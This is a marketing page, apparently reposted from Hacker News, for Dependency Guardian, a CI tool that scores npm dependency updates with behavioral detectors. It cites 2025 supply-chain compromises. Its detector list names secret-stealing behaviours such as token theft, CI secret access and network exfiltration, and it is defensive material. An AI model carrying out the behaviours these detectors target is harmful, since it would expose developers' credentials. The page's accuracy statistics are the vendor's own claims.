🔥 Check out this must-read post from Hacker News 📖
📂 **Category**:
📌 **What You’ll Learn**:
Behavioral Supply Chain Intelligence
Get visibility into dependency behavior in your CI pipeline. Every package change gets a risk score and behavioral report —
flag suspicious packages for review, auto-approve the rest. Configurable thresholds, allowlists, and a full audit trail for compliance.
No credit card required. Free forever.
2.6B
Weekly downloads affected in the Chalk / Debug compromise.
500+
Packages infected by the Shai-Hulud npm worm.
23K
Repositories impacted in the tj-actions supply chain incident.
Why You Need an Intake Gate
In 2025, these unreviewed dependency updates hit production.
None had a CVE. No intake process caught them. They merged through standard PR workflows.
2.6B
chalk + debug hijack
Weekly downloads compromised
500+
Shai-Hulud worm
Packages infected in 24 hours
2,349
S1ngularity campaign
Credentials stolen via install scripts
23K
tj-actions breach
Repos exposed, led to Coinbase breach
- Dependencies merge unreviewed
- CVE tools miss zero-day attacks
- No policy enforcement on upgrades
- No audit trail for compliance
- Every upgrade gets a verdict before merge
- Behavioral analysis catches new attacks
- Configurable pass/warn/block thresholds
- Full scan history and audit trail
Policy enforcement
Set thresholds, allowlist trusted packages, choose warn vs. block per repository. Your governance rules, automated.
Approval workflow
Every lockfile change gets a verdict posted as a PR comment. Review flagged packages before they merge.
5-minute CI setup
One YAML file or npm i -g @westbayberry/dg. Works with GitHub Actions, GitLab CI, Jenkins, and more.
Compliance-ready audit trail
Every scan logged with verdicts, risk scores, and findings. Built for teams that need to prove what was reviewed.
Detection accuracy validated against 11,000+ real packages (99.95% precision, 99.7% F1):
See benchmarks →
How it works
From dependency change to approved merge in four steps.
Step 01
Pull Request
A developer opens a PR that adds or updates npm packages in your lockfile.
package-lock.json
Step 02
Scan for Attacks
26 behavioral detectors analyze every file in each package for malicious code patterns.
26 detectors
Step 03
Pass / Warn / Block
A risk score determines the verdict — safe to merge, review needed, or blocked outright.
risk score
Step 04
Ship Safe
Merge with confidence knowing every dependency change was analyzed before reaching main.
merge ready
❯_
GITHUB ACTIONS
PR #247 bump lodash 4.17.20 → 4.17.21
→ Scanning 3 changed packages…
→ Running 26 detectors across 847 files
→ PASS — safe to merge
❯_
CLI
$ dg scan
Discovering package changes…
Scanning 3 packages (git-diff)…
Dependency Guardian
Score: 0 PASS
3 packages scanned, 0 flagged
In your pull request
Every dependency change gets a verdict posted directly in the PR. Review, approve, or block before merge.
Ship with confidence. Every dependency upgrade is reviewed, scored, and logged before it reaches main.
Built for dependency governance
Six capabilities that turn dependency updates into a controlled process.
CI enforcement on every PR
Runs automatically when package-lock.json changes. One YAML file. Every dependency upgrade goes through your intake gate before it can merge.
Configurable policy engine
Set risk thresholds per repository. Allowlist trusted packages. Choose between warn and block modes. Your governance rules, enforced automatically.
Pass / Warn / Block verdicts
Every PR gets a risk score and a clear verdict. Block mode prevents merging. Warn mode flags for human review. Your team stays in control.
Audit trail and scan history
Every scan is logged with verdicts, risk scores, and findings. Track who approved what, when. Built for compliance reviews and security audits.
Behavioral analysis engine
26 detectors analyze what packages actually do — install scripts, network calls, credential access, obfuscation. Catches zero-day attacks that CVE databases miss.
Your source code stays private
Only npm packages are scanned. Your application code is never uploaded. Self-hosted option available for enterprise environments.
What powers the verdicts
26 behavioral detectors analyze what packages actually do — the engine behind every pass, warn, and block decision.
Install Scripts
Child Process
Network Exfiltration
Obfuscation
Diff Risk
Fresh Publish
Maintainer Change
Sensitive Paths
Binary Addons
Filesystem Persistence
CI Secret Access
Suspicious API
GitHub Reputation
Source Mismatch
Purpose Mismatch
Typosquat
Root Scripts
Behavior Drift
Token Theft
Worm Behavior
Preinstall Timing
Legitimate API Exfil
Bun Runtime Evasion
Dependency Confusion
Browser Phishing
Empty Package
Works everywhere you build
GitHub Actions, GitLab CI, Jenkins, Bitbucket, CircleCI, or your terminal.
🔥 **What’s your take?**
Share your thoughts in the comments below!
#️⃣ **#Dependency #Guardian #WestBayBerry**
🕒 **Posted on**: 1771923366
🌟 **Want more?** Click here for more info! 🌟
